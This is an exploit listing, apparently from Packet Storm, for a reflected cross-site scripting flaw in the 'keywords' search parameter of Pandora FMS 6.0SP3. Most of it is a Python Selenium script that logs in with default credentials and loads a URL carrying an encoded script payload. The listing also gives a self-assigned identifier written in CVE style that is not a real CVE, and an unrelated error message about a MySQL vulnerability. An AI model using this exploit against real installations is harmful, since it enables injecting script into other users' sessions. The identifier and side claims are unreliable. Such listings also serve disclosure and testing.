Pandora FMS version 6.0SP3 suffers from a cross site scripting vulnerability.
3b6f367e28fda80ee9013841f4548d6f8dac15f5ef5c2407f7565d83c29588af# Exploit Title: XSS vulnerability for (keywords) searching parameter in
pandorafms-6.0SP3/pandora_console
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.27.2021
# Vendor: https://pandorafms.com/
# Link: https://github.com/pandorafms/pandorafms/releases
# CVE: 2021-0527-nu11secur1ty
# Proof:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-0527-nu11secur1ty
from selenium import webdriver
import time
import os, sys
# Vendor: https://pandorafms.com/
website_link="
http://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php"
# enter your login username
username="admin"
# enter your login password
password="pandora"
#enter the element for username input field
element_for_username="nick"
#enter the element for password input field
element_for_password="pass"
#enter the element for submit button
element_for_submit="login_button"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
time.sleep(3)
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit Pandora FMS 6.0 SP3-XSS-Vulnerability for (keywords) searching
parameter
time.sleep(3)
# Payload
browser.get(("
http://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php?keywords=%3Cscript%3Ealert%28%22nu11secur1ty_is_here%22%29%3B%3C%2Fscript%3E&head_search_keywords=abc"))
print("The payload is deployed, your GET parameter is vulnerable...\n")
except Exception:
#### This exception occurs if the element is not found on the webpage.
print("Sorry, but this user who you searching for is destroyed by using of
MySQL vulnerability in backend.php...")
----------------------------------------------------------------------------------------
# Exploit Title: XSS vulnerability for (keywords) searching parameter in
pandorafms-6.0SP3/pandora_console
# Date: 05.27.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://github.com/pandorafms/pandorafms/releases
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed